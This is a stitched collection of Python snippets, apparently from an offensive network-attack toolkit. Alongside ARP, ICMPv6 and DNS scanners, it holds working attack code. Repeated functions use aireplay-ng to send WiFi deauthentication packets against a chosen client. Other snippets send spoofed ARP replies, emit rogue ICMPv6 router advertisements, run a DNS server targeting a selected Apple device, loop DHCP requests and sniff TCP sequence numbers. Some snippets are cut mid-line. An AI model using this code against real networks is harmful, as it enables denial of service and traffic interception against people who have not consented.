def deauth_packets_send(network_interface: str = 'eth0', network_channel: str = '1', network_bssid: str = '12:34:56:78:90:ab', mac_address: str = '12:34:56:78:90:ac', number_of_deauth: int = 5): global aireply_stop # Start target requests sniffer function threat_manager = ThreadManager(2) threat_manager.add_task(requests_sniffer, mac_address) # Set WiFi channel on interface for send WiFi deauth packets sub.Popen( ['iwconfig ' + network_interface + ' channel ' + network_channel], shell=True) # Start deauth packets numbers deauth_packets_number = number_of_deauth aireply_stop = False while deauth_packets_number < 50: # Check global variable aireplay_stop if aireply_stop: base.print_info('Stop aireplay-ng ...') break # Start aireplay-ng process try: base.print_info('Send WiFi deauth packets in aireplay-ng ...') aireplay_process = sub.Popen([ 'aireplay-ng ' + network_interface + ' -0 ' + str(deauth_packets_number) + ' -a ' + network_bssid + ' -c ' + mac_address ], shell=True, stdout=sub.PIPE) while True: output = aireplay_process.stdout.readline().decode() if output == '' and aireplay_process.poll() is not None: break if output: stdout.write( re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))', base.c_info + r'\g<1>', output)) except OSError: base.print_error('Something else went wrong while trying to run ', '`aireply-ng`') exit(2) # Wait before sniff request packet from target base.print_info('Wait 10 sec. before sniff packets from target: ' + mac_address) sleep(10) # Add 5 packets to number of WiFi deauth packets deauth_packets_number += 5
def deauth_packets_send(): # Start DHCP or ARP requests sniffer function tm = ThreadManager(2) tm.add_task(dhcp_request_sniffer) sleep(3) # Set WiFi channel on interface for send WiFi deauth packets sub.Popen(['iwconfig ' + deauth_network_interface + ' channel ' + channel], shell=True) Base.print_info("Send WiFi deauth packets ...") # Start deauth packets numbers = 3 deauth_packets_number = 3 while not sniff_dhcp_request: # Start aireplay-ng process try: aireplay_process = sub.Popen([ 'aireplay-ng ' + deauth_network_interface + ' -0 ' + str(deauth_packets_number) + ' -a ' + bssid + ' -c ' + target_mac_address ], shell=True, stdout=sub.PIPE) while True: output = aireplay_process.stdout.readline() if output == '' and aireplay_process.poll() is not None: break if output: stdout.write( re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))', Base.c_info + r'\g<1>', output)) except OSError as e: if e.errno == errno.ENOENT: Base.print_error("Program: ", "aireply-ng", " is not installed!") exit(1) else: Base.print_error( "Something else went wrong while trying to run ", "`aireply-ng`") exit(2) # Wait before sniff ARP or DHCP request packet sleep(5) # Add 5 packets to number of WiFi deauth packets if deauth_packets_number < 30: deauth_packets_number += 5
def search_router( self, network_interface: str = 'eth0', timeout: int = 3, retry: int = 3, exit_on_failure: bool = True) -> Dict[str, Union[int, str]]: """ Search IPv6 router in network :param network_interface: Network interface name (example: 'eth0') :param timeout: Timeout in seconds (default: 3) :param retry: Retry number (default: 3) :param exit_on_failure: Exit if IPv6 router in network not found (default: True) :return: IPv6 router information dictionary (example: {'router_mac_address': '01:23:45:67:89:0a', 'router_ipv6_address': 'fe80::1234:5678:90ab:cdef', 'flags': '0x0', 'router-lifetime': 0, 'reachable-time': 0, 'retrans-timer': 0, 'prefix': 'fd00::/64', 'vendor': 'D-Link International'}) """ # region Clear lists with scan results self.results.clear() self.unique_results.clear() self.mac_addresses.clear() # endregion # region Set variables self.router_search = True self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run _sniffer tm = ThreadManager(2) tm.add_task(self._sniff) # endregion # region Run _sender self._send() # endregion # region Wait sleep(self.timeout) # endregion # region Return IPv6 router information if len(self.router_info.keys()) == 0: if exit_on_failure: self.base.error_text( 'Could not found IPv6 Router on interface: ' + self.network_interface) exit(1) return self.router_info
def get_mac_address(self, network_interface, target_ip_address, timeout=5, retry=5, exit_on_failure=True): try: # region Set variables self.target_ip_address = target_ip_address self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run sniffer tm = ThreadManager(2) tm.add_task(self.sniff) # endregion # region Run sender self.send() # endregion # region Wait sleep(self.timeout) # endregion # region Return if 'mac-address' in self.results[0].keys(): return self.results[0]['mac-address'] else: return "ff:ff:ff:ff:ff:ff" # endregion except IndexError: if exit_on_failure: self.base.print_error( "Could not find MAC address of IP address: ", target_ip_address) exit(1) else: return "ff:ff:ff:ff:ff:ff" except KeyboardInterrupt: self.base.print_info("Exit") exit(0)
def search_router(self, network_interface, timeout=3, retry=3): # region Set variables self.router_search = True self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run sniffer tm = ThreadManager(2) tm.add_task(self.sniff) # endregion # region Run sender self.send() # endregion # region Wait sleep(self.timeout) # endregion # region Return results return self.router_info
def deauth_packets_send(network_interface, network_channel, network_bssid, mac_address, number_of_deauth): global aireply_stop # Start target requests sniffer function tm = ThreadManager(2) tm.add_task(requests_sniffer, mac_address) # Set WiFi channel on interface for send WiFi deauth packets sub.Popen( ['iwconfig ' + network_interface + ' channel ' + network_channel], shell=True) # Start deauth packets numbers deauth_packets_number = number_of_deauth aireply_stop = False while deauth_packets_number < 50: # Check global variable aireplay_stop if aireply_stop: Base.print_info("Stop aireplay-ng ...") break # Start aireplay-ng process try: Base.print_info("Send WiFi deauth packets in aireplay-ng ...") aireplay_process = sub.Popen([ 'aireplay-ng ' + network_interface + ' -0 ' + str(deauth_packets_number) + ' -a ' + network_bssid + ' -c ' + mac_address ], shell=True, stdout=sub.PIPE) while True: output = aireplay_process.stdout.readline() if output == '' and aireplay_process.poll() is not None: break if output: stdout.write( re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))', Base.c_info + r'\g<1>', output)) except OSError as e: if e.errno == errno.ENOENT: Base.print_error("Program: ", "aireply-ng", " is not installed!") exit(1) else: Base.print_error( "Something else went wrong while trying to run ", "`aireply-ng`") exit(2) # Wait before sniff request packet from target Base.print_info("Wait 10 sec. before sniff packets from target: " + mac_address) sleep(10) # Add 5 packets to number of WiFi deauth packets deauth_packets_number += 5
if target_apple_device is not None: if len(target_apple_device) == 3: target_ip_address = target_apple_device[0] target_mac_address = target_apple_device[1] else: Base.print_error("Bad value in target Apple device!") exit(1) else: Base.print_error("Target Apple device not found!") exit(1) # endregion # region Run DNS server Base.print_info("Start DNS server ...") TM.add_task(start_dns_server, listen_network_interface, target_mac_address, technique_index, your_ip_address, se_domain) # endregion # region Get network interface gateway IPv6 address if technique_index in [5, 6]: Base.print_info("Search IPv6 Gateway and DNS server ...") router_advertisement_data = ICMPv6Scan.search_router( listen_network_interface, 5, 3) if router_advertisement_data is not None: gateway_ipv6_address = router_advertisement_data[ 'router_ipv6_address'] if 'dns-server' in router_advertisement_data.keys(): dns_ipv6_address = router_advertisement_data['dns-server']
if target['mac_address'] is not None: base.print_info('Target MAC: ', target['mac_address']) if target['ipv6_address'] is not None: base.print_info('Target Global IPv6: ', target['ipv6_address']) else: base.print_info('First suffix offer IP: ', str(first_suffix)) base.print_info('Last suffix offer IP: ', str(last_suffix)) base.print_info('Prefix: ', network_prefix) base.print_info('Router IPv6 address: ', your_local_ipv6_address) base.print_info('DNS IPv6 address: ', recursive_dns_address) base.print_info('Domain search: ', dns_search) # endregion # region Send ICMPv6 advertise packets in other thread tm.add_task(send_icmpv6_advertise_packets) # endregion # region Add multicast MAC addresses on interface try: base.print_info('Get milticast MAC address on interface: ', current_network_interface) mcast_addresses = sub.Popen( ['ip maddress show ' + current_network_interface], shell=True, stdout=sub.PIPE) out, err = mcast_addresses.communicate() if icmpv6_router_solicitation_address not in str(out): icmpv6_mcast_address = sub.Popen([ 'ip maddress add ' + icmpv6_router_solicitation_address +
def resolve( self, ns_servers, # type: List[Dict[str, str]] domain, # type: str subdomains_list=[], # type: List[str] subdomains_file=None, # type: str subdomains_brute=False, # type: bool max_threats_count=10, # type: int udp_destination_port=53, # type: int timeout=30 # type: int ): # type: (...) -> List[Dict[str, str]] """ DNS resolve all subdomains in target domain :param ns_servers: List of DNS servers (example: [{'ipv4 address': '8.8.8.8', 'mac address': '01:23:45:67:89:0a'}]) :param domain: Target domain (example: 'test.com') :param subdomains_list: List of subdomains (example: ['www','ns','mail']) :param subdomains_file: Name of file with subdomains (default: None) :param subdomains_brute: Brute mode on (auto make list with subdomains) if True, Brute mode off if False (default: False) :param max_threats_count: Maximum threats count (default: 10) :param udp_destination_port: UDP destination port (default: 53) :param timeout: Connection after send all DNS queries (default: 30) :return: List of dictionary (example: [{'Domain': 'www.test.com', 'IPv4 address': '1.2.3.4', 'IPv6 address': '-'}]) """ try: # region Set target domain assert not (domain is None or domain == ''), \ 'Target domain is empty, please set target domain in this parameter: ' + self.base.info_text('domain') self.domain = domain # endregion # region Subdomains list if len(subdomains_list) > 0: self.subdomains = subdomains_list # endregion # region Subdomains file if subdomains_file is not None: assert isfile(subdomains_file), \ 'File with subdomain list:' + self.base.error_text(subdomains_file) + ' not found!' with open(subdomains_file) as subdomains_file_descriptor: for subdomain in subdomains_file_descriptor.read( ).splitlines(): self.subdomains.append(subdomain) # endregion # region Subdomains brute if subdomains_brute: if not self.quiet: self.base.print_info( 'Make subdomains list for brute .... ') for character1 in self.available_characters: self.subdomains.append(character1) for character2 in self.available_characters: self.subdomains.append(character1 + character2) for character3 in self.available_characters: self.subdomains.append(character1 + character2 + character3) # endregion # region Check length of subdomains list assert len(self.subdomains) != 0, \ 'List containing subdomains is empty, please set any of this parameters: ' \ + self.base.info_text('subdomain_list') + ' or ' \ + self.base.info_text('subdomain_file') + ' or ' \ + self.base.info_text('subdomain_brute') # endregion # region Create raw socket raw_socket = socket(AF_PACKET, SOCK_RAW) raw_socket.bind((self.network_interface, 0)) # endregion # region Sniff DNS answers if not self.quiet: self.base.print_info('Start DNS answers sniffer ...') threats = ThreadManager(max_threats_count) threats.add_task(self._sniff_packets, self.your_mac_address, self.your_ipv4_address, self.your_ipv6_address, udp_destination_port) # endregion # region Send DNS queries if not self.quiet: self.base.print_info('Start sending DNS queries, time: ', str(datetime.now())) self._send_queries(send_socket=raw_socket, source_mac_address=self.your_mac_address, source_ipv4_address=self.your_ipv4_address, source_ipv6_address=self.your_ipv6_address, domain=domain, ns_servers=ns_servers, destination_port=udp_destination_port, max_threats_count=int(max_threats_count) - 1, subdomains=self.subdomains) # endregion # region Timeout if not self.quiet: self.base.print_info('Wait timeout: ', str(timeout) + ' sec') sleep(timeout) # endregion # region Return results return self.results # endregion except AssertionError as Error: self.base.print_error(Error.args[0]) exit(1)
def _send_queries( self, send_socket, # type: socket source_mac_address, # type: str source_ipv4_address, # type: str source_ipv6_address, # type: str domain, # type: str ns_servers, # type: List[Dict[str, str]] destination_port=53, # type: int max_threats_count=9, # type: int subdomains=['www'], # type: List[str] queries_type=[1, 28], # type: List[int] queries_class=[1] # type: List[int] ): # type: (...) -> None """ Send DNS queries to IPv4/IPv6 DNS servers :param send_socket: Raw socket for sending DNS queries :param source_mac_address: Source MAC address for DNS query (most likely this is MAC address on your network interface) :param source_ipv4_address: Source IPv4 address for DNS query (most likely this is IPv4 address on your network interface) :param source_ipv6_address: Source IPv6 address for DNS query (most likely this is IPv6 address on your network interface) :param domain: Target domain (example: 'test.com') :param ns_servers: List of DNS servers (example: [{'ipv4 address': '8.8.8.8', 'mac address': '01:23:45:67:89:0a'}]) :param destination_port: UDP destination port (default: 53) :param max_threats_count: Maximum threats count (default: 9) :param subdomains: List of subdomains (default: ['www']) :param queries_type: List of queries type (default: [1, 28]; type 1: A, type 28: AAAA) :param queries_class: List of queries class (default: [1]; class 1: IN) :return: None """ # DNS query type: 1 (A) # DNS query type: 28 (AAAA) # DNS query class: 1 (IN) # region Init threat manager send_threats = ThreadManager(max_threats_count) # endregion # region Make DNS queries list queries = list() for subdomain in subdomains: for query_type in queries_type: for query_class in queries_class: queries.append({ 'type': query_type, 'class': query_class, 'name': subdomain + '.' + domain }) # endregion # region Calculate number of DNS queries for one threat queries_len = len(queries) ipv4_ns_servers_len = 0 ipv6_ns_servers_len = 0 for ns_server in ns_servers: if 'ipv4 address' in ns_server.keys(): ipv4_ns_servers_len += 1 if 'ipv6 address' in ns_server.keys(): ipv6_ns_servers_len += 1 if source_ipv6_address is not None: queries_len_for_threat = int( (queries_len * (ipv4_ns_servers_len + ipv6_ns_servers_len)) / max_threats_count) + 1 else: queries_len_for_threat = int( (queries_len * ipv4_ns_servers_len) / max_threats_count) + 1 # endregion # region Send DNS queries # region Send DNS queries to IPv4 NS servers for ns_server in ns_servers: if 'ipv4 address' in ns_server.keys(): for query_index in range(0, queries_len, queries_len_for_threat): send_threats.add_task( self._send_ipv4_queries, source_mac_address, source_ipv4_address, ns_server['mac address'], ns_server['ipv4 address'], destination_port, queries[query_index:query_index + queries_len_for_threat], send_socket) # endregion # region Send DNS queries to IPv6 NS servers if source_ipv6_address is not None: for ns_server in ns_servers: if 'ipv6 address' in ns_server.keys(): for query_index in range(0, queries_len, queries_len_for_threat): send_threats.add_task( self._send_ipv6_queries, source_mac_address, source_ipv6_address, ns_server['mac address'], ns_server['ipv6 address'], destination_port, queries[query_index:query_index + queries_len_for_threat], send_socket) # endregion # endregion # region Wait all threats send_threats.wait_for_completion()
def get_mac_address(self, network_interface: str = 'eth0', target_ip_address: str = '192.168.0.1', timeout: int = 5, retry: int = 5, exit_on_failure: bool = True, show_scan_percentage: bool = True) -> str: """ Get MAC address of IP address on network interface :param network_interface: Network interface name (example: 'eth0') :param timeout: Timeout in seconds (default: 3) :param retry: Retry number (default: 3) :param target_ip_address: Target IPv4 address (example: 192.168.0.1) :param exit_on_failure: Exit if MAC address of target IP address not found (default: True) :param show_scan_percentage: Show ARP scan progress percentage (default: True) :return: MAC address of target IP address (example: '01:23:45:67:89:0a') """ # region Set result MAC address value result_mac_address = 'ff:ff:ff:ff:ff:ff' # endregion try: # region Clear lists with scan results self.results.clear() self.unique_results.clear() self.mac_addresses.clear() # endregion # region Set variables self.quit = not show_scan_percentage self.target_ip_address = target_ip_address self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run _sniffer tm = ThreadManager(2) tm.add_task(self._sniff) # endregion # region Run sender self._send() # endregion # region Wait sleep(self.timeout) # endregion # region Return if 'mac-address' in self.results[0].keys(): result_mac_address = self.results[0]['mac-address'] # endregion except IndexError: pass except KeyboardInterrupt: self.base.print_info('Exit') exit(0) if result_mac_address == 'ff:ff:ff:ff:ff:ff': if exit_on_failure: self.base.print_error( 'Could not find MAC address of IP address: ', target_ip_address) exit(1) return result_mac_address
def scan(self, network_interface: str = 'eth0', timeout: int = 3, retry: int = 3, target_ip_address: Union[None, str] = None, check_vendor: bool = True, exclude_ip_addresses: Union[None, List[str]] = None, exit_on_failure: bool = True, show_scan_percentage: bool = True) -> List[Dict[str, str]]: """ ARP scan on network interface :param network_interface: Network interface name (example: 'eth0') :param timeout: Timeout in seconds (default: 3) :param retry: Retry number (default: 3) :param target_ip_address: Target IPv4 address (example: 192.168.0.1) :param check_vendor: Check vendor of hosts (default: True) :param exclude_ip_addresses: Exclude IPv4 address list (example: ['192.168.0.1','192.168.0.2']) :param exit_on_failure: Exit if alive hosts in network not found (default: True) :param show_scan_percentage: Show ARP scan progress percentage (default: True) :return: Result list of alive hosts (example: [{'mac-address': '01:23:45:67:89:0a', 'ip-address': '192.168.0.1'}]) """ try: # region Clear lists with scan results self.results.clear() self.unique_results.clear() self.mac_addresses.clear() # endregion # region Set variables self.quit = not show_scan_percentage self.target_ip_address = target_ip_address self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run _sniffer tm = ThreadManager(2) tm.add_task(self._sniff) # endregion # region Run sender self._send() # endregion # region Wait sleep(self.timeout) # endregion # region Unique results for index in range(len(self.results)): if self.results[index][ 'mac-address'] not in self.mac_addresses: self.unique_results.append(self.results[index]) self.mac_addresses.append( self.results[index]['mac-address']) # endregion # region Exclude IP addresses if exclude_ip_addresses is not None: self.results = self.unique_results self.unique_results = list() for index in range(len(self.results)): if self.results[index][ 'ip-address'] not in exclude_ip_addresses: self.unique_results.append(self.results[index]) self.results = list() # endregion # region Get vendors if check_vendor: for result_index in range(len(self.unique_results)): self.unique_results[result_index]['vendor'] = \ self.base.get_vendor_by_mac_address(self.unique_results[result_index]['mac-address']) # endregion except KeyboardInterrupt: self.base.print_info('Exit') exit(0) if len(self.unique_results) == 0: if exit_on_failure: self.base.print_error( 'Could not find allive hosts on interface: ', self.network_interface) exit(1) return self.unique_results
if args.src_port is None: src_port = randint(1024, 65535) else: src_port = args.src_port dst_ip_address = args.target_ip if args.target_mac is None: dst_mac_address = Base.get_mac(current_network_interface, dst_ip_address) dst_port = args.target_port data = args.data print Base.c_info + "Interface: " + current_network_interface print Base.c_info + "Src MAC: " + src_mac_address print Base.c_info + "Src IP: " + src_ip_address print Base.c_info + "Src PORT: " + str(src_port) print Base.c_info + "Dst MAC: " + dst_mac_address print Base.c_info + "Dst IP: " + dst_ip_address print Base.c_info + "Dst PORT: " + str(dst_port) tm.add_task(sender) print Base.c_info + "Waiting for TCP connection from " + dst_ip_address + " or ARP ... " sniff(filter="(tcp and src host " + dst_ip_address + " and src port " + str(dst_port) + " and dst host " + src_ip_address + " and dst port " + str(src_port) + ") or arp", prn=get_syn_and_ack_numbers, iface=current_network_interface)
def scan(self, network_interface, timeout=3, retry=3, target_ip_address=None, check_vendor=True, exclude_ip_address=None): # region Set variables self.target_ip_address = target_ip_address self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) # endregion # region Run sniffer tm = ThreadManager(2) tm.add_task(self.sniff) # endregion # region Run sender self.send() # endregion # region Create vendor list if check_vendor: self.vendor_list = self.base.get_mac_prefixes() # endregion # region Wait sleep(self.timeout) # endregion # region Unique results for index in range(len(self.results)): if self.results[index]['mac-address'] not in self.mac_addresses: self.unique_results.append(self.results[index]) self.mac_addresses.append(self.results[index]['mac-address']) # endregion # region Reset results and mac addresses list self.results = [] self.mac_addresses = [] # endregion # region Exclude IP address if exclude_ip_address is not None: self.results = self.unique_results self.unique_results = [] for index in range(len(self.results)): if self.results[index]['ip-address'] != exclude_ip_address: self.unique_results.append(self.results[index]) self.results = [] # endregion # region Get vendors for result_index in range(len(self.unique_results)): # Get current MAC address prefix current_mac_prefix = self.eth.get_mac_prefix(self.unique_results[result_index]['mac-address']) # Search this prefix in vendor list for vendor_index in range(len(self.vendor_list)): if current_mac_prefix == self.vendor_list[vendor_index]['prefix']: self.unique_results[result_index]['vendor'] = self.vendor_list[vendor_index]['vendor'] break # Could not find this prefix in vendor list if 'vendor' not in self.unique_results[result_index].keys(): self.unique_results[result_index]['vendor'] = "Unknown vendor" # endregion # region Return results return self.unique_results
base.print_info('Find Apple devices in local network with ARP scan ...') apple_devices: List[List[str]] = scanner.find_apple_devices_by_mac(listen_network_interface) else: base.print_info('Find Apple devices in local network with nmap scan ...') apple_devices: List[List[str]] = scanner.find_apple_devices_with_nmap(listen_network_interface) apple_device = scanner.apple_device_selection(apple_devices=apple_devices, exit_on_failure=True) # endregion # region Print target IP and MAC address if not args.quit: base.print_info('Target: ', apple_device[0] + ' (' + apple_device[1] + ')') # endregion # region Start _sniffer tm = ThreadManager(2) tm.add_task(_sniffer) # endregion # region Send first Multicast ARP request packets sleep(3) if not args.quit: base.print_warning('Send initial Multicast ARP requests') _send_arp_requests(source_mac_address=your_mac_address, send_socket=raw_socket, random_ip_address=base.get_random_ip_on_interface(listen_network_interface), count_of_packets=5) # endregion # region Wait for completion tm.wait_for_completion() # endregion
def scan(self, network_interface: str = 'eth0', timeout: int = 3, retry: int = 3, target_mac_address: Union[None, str] = None, check_vendor: bool = True, exit_on_failure: bool = True) -> List[Dict[str, str]]: """ Find alive IPv6 hosts in local network with echo (ping) request packets :param network_interface: Network interface name (example: 'eth0') :param timeout: Timeout in seconds (default: 3) :param retry: Retry number (default: 3) :param target_mac_address: Target MAC address (example: 192.168.0.1) :param check_vendor: Check vendor of hosts (default: True) :param exit_on_failure: Exit if alive IPv6 hosts in network not found (default: True) :return: List of alive hosts in network (example: [{'mac-address': '01:23:45:67:89:0a', 'ip-address': 'fe80::1234:5678:90ab:cdef', 'vendor': 'Apple, Inc.'}]) """ # region Clear lists with scan results self.results.clear() self.unique_results.clear() self.mac_addresses.clear() # endregion # region Set variables if target_mac_address is not None: self.base.mac_address_validation(mac_address=target_mac_address, exit_on_failure=True) self.target_mac_address = target_mac_address self.network_interface = network_interface self.timeout = int(timeout) self.retry_number = int(retry) self.icmpv6_identifier = randint(1, 65535) # endregion # region Run _sniffer tm = ThreadManager(2) tm.add_task(self._sniff) # endregion # region Run _sender self._send() # endregion # region Wait sleep(self.timeout) # endregion # region Unique results for index in range(len(self.results)): if self.results[index]['mac-address'] not in self.mac_addresses: self.unique_results.append(self.results[index]) self.mac_addresses.append(self.results[index]['mac-address']) # endregion # region Get vendors if check_vendor: for result_index in range(len(self.unique_results)): self.unique_results[result_index]['vendor'] = \ self.base.get_vendor_by_mac_address(self.unique_results[result_index]['mac-address']) # endregion # region Return results if len(self.unique_results) == 0: if exit_on_failure: self.base.error_text( 'Could not found alive IPv6 hosts on interface: ' + self.network_interface) exit(1) return self.unique_results
Base.print_info("Received a new IP address: ", current_ip_address) # endregion # region Rewrite old mac and ip addresses old_mac_address = current_mac_address old_ip_address = current_ip_address # endregion sleep(int(args.delay)) # endregion else: # region Start DHCP sender in other thread tm = ThreadManager(2) tm.add_task(send_dhcp_discover) # endregion # region Set network filter network_filters = {} network_filters['IP'] = {'destination-ip': your_ip_address} network_filters['UDP'] = {'source-port': 67} network_filters['UDP'] = {'destination-port': 67} # endregion # region Start sniffer sniff = Sniff_raw() sniff.start(protocols=['IP', 'UDP', 'DHCP'], prn=send_dhcp_request, filters=network_filters) # endregion
target_ip=_target_ip_address) if args.broadcast: destination_mac_address = "ff:ff:ff:ff:ff:ff" else: destination_mac_address = "33:33:00:00:00:01" _arp_request = _arp.make_request(ethernet_src_mac=_current_mac_address, ethernet_dst_mac=destination_mac_address, sender_mac=_current_mac_address, sender_ip=_target_ip_address, target_mac="00:00:00:00:00:00", target_ip=Base.get_netiface_random_ip(_current_network_interface)) # endregion # region Start ARP sniffer TM.add_task(arp_sniffer) # endregion # region Send only ARP reply packets if args.replies: Base.print_info("Send only ARP reply packets to: ", str(_target_ip_address) + " (" + str(_target_mac_address) + ")") for _ in range(_number_of_packets): _sock.send(_arp_response) sleep(0.5) _sock.close() # endregion # region Send only ARP request packets elif args.requests:
Base.print_error( "Could not find device MAC address with IP address: ", target_ip) exit(1) else: apple_device = [target_ip, target_mac] # endregion # region Print target IP and MAC address Base.print_info("Target: ", apple_device[0] + " (" + apple_device[1] + ")") # endregion # region Start sniffer tm = ThreadManager(2) tm.add_task(sniffer) # endregion # region Send first Multicast ARP request sleep(3) Base.print_warning("Send initial Multicast ARP requests") send_arp_request() # endregion # region Wait for completion tm.wait_for_completion() # endregion except KeyboardInterrupt: Base.print_info("Exit") exit(0)